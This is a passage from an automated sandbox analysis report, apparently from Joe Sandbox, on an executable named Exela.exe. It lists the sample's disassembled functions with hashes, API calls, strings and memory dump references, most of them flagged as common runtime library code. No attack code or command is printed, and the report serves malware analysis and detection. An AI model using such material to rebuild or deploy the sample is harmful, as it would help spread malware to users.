                                                                                                    • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                    • Instruction ID: a1072ec89668f8278928c6cadc224fb97ae77f5b3bbdcb8454deec88d1f64dd4
                                                                                                    • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                    • Instruction Fuzzy Hash: 33F06221B09B1A81FB10BB24E45A37AA320EF49761F9C47B5C67E462F4DF2CD444C364
                                                                                                    Function 00007FF75AEB93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction ID: 096d61439cbb509755554546ccff3729beeb84aa50cc365daa6e78b9063f459d
                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction Fuzzy Hash: 9911BF62E1CB3B41F65431A4D4DF3B9A0446F5A360F8C4BB4EA6E062D68F2CAC4142A4
                                                                                                    Function 00007FF75AEAB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB41F
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB43E
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB466
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB477
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB488
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                    • Instruction ID: 4a939da0c258c316aa3a161b0d7937b10bdc9bdad022bd1f95d20fae419fbcee
                                                                                                    • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                    • Instruction Fuzzy Hash: 56118E20F0C67241FA58B322A6AB179E1425F847B0FCC83B4E87D476D6EE2CEC018321
                                                                                                    Function 00007FF75AEAB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                    • Instruction ID: d96abdc1735e9a3c48c83000acd533ad98f74161f52f259a83581d19505135f5
                                                                                                    • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                    • Instruction Fuzzy Hash: AB111520E0926781FA687326646B2BA91824F46720FCC87B4D97E4A2C2DD2CB8118331
                                                                                                    Function 00007FF75AEA6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: verbose
                                                                                                    • API String ID: 3215553584-579935070
                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                    • Instruction ID: 4aa6e6e2902e37364334a322745afdda62c925a9819adc53e0bd3a7edee81c7c
                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                    • Instruction Fuzzy Hash: 8491DE32A08A6681F760BE28D45A37DBA91AF43B94FCC4176DA9E433D5DF3CE4458320
                                                                                                    Function 00007FF75AEAFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                    • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                    • Instruction ID: 3fb4a9350b19ca4c4786fef75e800bbffc3706ca0406780962aaeea97991470e
                                                                                                    • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                    • Instruction Fuzzy Hash: 3A81C332E0C26385F7657F29811A378B7A0AF11B58FDE80B5DA4997295DF2DE901C321
                                                                                                    Function 00007FF75AE9D6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                    • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                    • Instruction ID: d92ca4346882baa35e7908e1d2c455b35271a8e0a8c466933c98df6c9e3f8777
                                                                                                    • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                    • Instruction Fuzzy Hash: A651A032B197228EFB24BB15E485A78A391EF44B98F988170DA4E43749DF3CE841C720
                                                                                                    Function 00007FF75AE9F2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                    • String ID: csm$csm
                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                    • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                    • Instruction ID: 14071bf1999c45793bad5e3388ea55c069f67863c66b170a2190b701d1962f94
                                                                                                    • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                    • Instruction Fuzzy Hash: 5451A0729083A28EFB64BE219146B68B6A4FF54B94F9C8275DA4C47799CF3CE850C710
                                                                                                    Function 00007FF75AE9EF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                    • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                    • Instruction ID: 540c196a548f2c856d508b08e40695b6f8c67d2960c60530a10d583b4ea8d961
                                                                                                    • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                    • Instruction Fuzzy Hash: 1D61D232908BD589EB20AB15E4427AAF7A0FF84B84F484275EB9C03B95DF7CD190CB50
                                                                                                    Function 00007FF75AE92810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                    • API String ID: 2030045667-255084403
                                                                                                    • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                    • Instruction ID: 378633b91a65d3ab7784f3fcee03ea6a5e1a46a3dc1440622e7e93e0a444ff59
                                                                                                    • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                    • Instruction Fuzzy Hash: DB21D162B08B5196F720BB14F8467EAA3A0FF88780F844136EE8D57755DE3CD645C710
                                                                                                    Function 00007FF75AEAC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718003287-0
                                                                                                    • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                    • Instruction ID: c028abf86631ec4877a2939a4b8d6839013e72de22922ae285f6860ac433dc72
                                                                                                    • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                    • Instruction Fuzzy Hash: 58D14472B08A948AF710EFA4D4451BC77B1FF84798B888275DE5EA7B89DE38D406C310
                                                                                                    Function 00007FF75AE920C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1956198572-0
                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                    • Instruction ID: 2a07edad9a2e8a70f95aa7004c0bb2339cfd1536b19b8aa65725e6adeb578c8c
                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                    • Instruction Fuzzy Hash: C411E921B0C26646FA54B76AE54A6BA9292FF84780FCC8170DF4907B99DE2DD8D58210
                                                                                                    Function 00007FF75AEB5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                    • String ID: ?
                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                    • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                    • Instruction ID: 10508e4130a64dee4c09c864dfcac040f3ce2068d20b96f0d6ca43f1a55b4730
                                                                                                    • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                    • Instruction Fuzzy Hash: 41412A32A083AA41F760BB15A44A379D651EF80BA4F584375EE5D06AD5DF3CD8428B20
                                                                                                    Function 00007FF75AEA9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEA90B6
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF75AE9CC15), ref: 00007FF75AEA90D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Exela.exe
                                                                                                    • API String ID: 3580290477-3619601554
                                                                                                    • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                    • Instruction ID: 81401ee1183dc8aa3e7d0b25a36fc2ac9f1b17f6b02db8872a4e0628b7ebc2ae
                                                                                                    • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                    • Instruction Fuzzy Hash: BA418236A08B2286FB54FF25A8960BDA794EF447D4FDD8075EA4D43B85DE3CE4818360
                                                                                                    Function 00007FF75AEACCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                    • Instruction ID: 8fd12d45e55f955855692987b5b4a5ae8a71d04723048270c4213641927f796d
                                                                                                    • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                    • Instruction Fuzzy Hash: 3E41E332B18B5585EB20BF65E4493AAA760FF88784F884035EE4D97B88EF3CD401C750
                                                                                                    Function 00007FF75AEAF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID: :
                                                                                                    • API String ID: 1611563598-336475711
                                                                                                    • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                    • Instruction ID: d0ca27f50b3d8d6ea6396d274946eb701d65cf6ee1a9dafadde8a1e0db84d645
                                                                                                    • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                    • Instruction Fuzzy Hash: 72210932A0829182FB20BB11D05A17DB3B1FFC8B44FD98079D68C43694DF7CD94587A1
                                                                                                    Function 00007FF75AE9FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
